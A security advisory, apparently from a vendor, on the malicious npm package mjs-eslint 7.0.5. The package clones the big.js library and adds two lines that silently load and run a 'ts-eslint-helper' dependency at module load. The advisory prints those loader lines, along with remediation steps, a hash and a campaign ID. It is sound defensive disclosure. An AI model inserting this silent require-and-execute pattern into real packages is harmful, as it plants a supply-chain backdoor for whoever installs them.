Which versions of mjs-eslint are malicious?

The following npm versions of mjs-eslint are flagged malicious: 7.0.5. Treat any of these as compromised.

How do I remediate mjs-eslint if I installed it?

Remove mjs-eslint from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is mjs-eslint part of a known attack campaign?

Yes — mjs-eslint is associated with the IN-MAL-2026-007069 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect mjs-eslint in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking mjs-eslint and packages like it before any post-install script runs.

Malicious package

mjs-eslintnpm

Malicious code in mjs-eslint (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6223

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall mjs-eslint

What this malware does

The package is published as 'mjs-eslint' but its description, file layout (big.js, big.mjs), and source are a verbatim copy of the legitimate big.js arbitrary-precision arithmetic library by Michael Mclaughlin. Two lines have been inserted into the IIFE at big.js:605-606 (and identically in big.mjs:605-606): const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });. The corresponding dependency "ts-eslint-helper": "^4.0.1" is declared in package.json. This call fires at module load on any require('mjs-eslint') or import of the package, executes asynchronously, and silently swallows all errors via .catch(()=>{}). An arithmetic library has no legitimate reason to load a 'ts-eslint' helper at module init, and the name mismatch between the host package (mjs-eslint), the cloned library (big.js), and the dependency (ts-eslint-helper) is the canonical pattern of hiding the payload one hop away in a transitive dependency to evade scanners. Installer harm: any consumer who requires this package pulls in and executes whatever ts-eslint-helper's from_str() contains, with no visible signal.

Malicious versions

1 flagged

7.0.5

Indicators of compromise (SHA-256)

51c6776509c718cebce5fe0ef0f5be73ede28f3be69888bfadff198f25ac2df6

Frequently asked questions

No. mjs-eslint on npm has been identified as a malicious package (version 7.0.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007069

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection